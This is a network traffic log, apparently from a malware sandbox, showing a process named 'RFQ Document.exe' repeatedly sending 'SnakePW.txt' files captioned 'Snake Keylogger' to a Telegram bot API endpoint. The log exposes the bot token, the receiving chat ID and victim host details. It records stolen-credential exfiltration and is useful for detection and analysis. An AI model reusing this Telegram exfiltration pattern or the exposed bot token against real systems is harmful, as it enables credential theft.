2021-09-28 06:00:07 UTC	538	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 38 35 32 62 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc852b9aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:07 UTC	539	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:07 UTC	539	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12924,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.2.4	50178	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:07 UTC	540	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fca1c74e Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:07 UTC	540	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 61 31 63 37 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fca1c74eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:07 UTC	540	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:07 GMT Content-Type: application/json Content-Length: 519 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:07 UTC	541	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12925,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.2.4	50179	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:07 UTC	541	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fcbe6377 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:07 UTC	542	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 62 65 36 33 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fcbe6377Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:07 UTC	542	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:07 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12926,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.2.4	50180	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:07 UTC	543	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fcdb0035 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:07 UTC	543	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 64 62 30 30 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fcdb0035Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:07 UTC	544	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:07 UTC	544	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12927,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.2.4	50181	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:07 UTC	544	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fd012540 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:07 UTC	545	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 30 31 32 35 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fd012540Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:07 UTC	545	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:07 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12929,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.2.4	50182	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:08 UTC	546	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fd24e880 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:08 UTC	546	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 32 34 65 38 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fd24e880Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:08 UTC	547	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:08 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12930,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.2.4	50183	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:08 UTC	548	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fd4b0f70 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:08 UTC	548	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 34 62 30 66 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fd4b0f70Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:08 UTC	548	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:08 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:08 UTC	549	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12931,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.2.4	50184	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:08 UTC	549	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fd654c02 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:08 UTC	550	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 36 35 34 63 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fd654c02Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
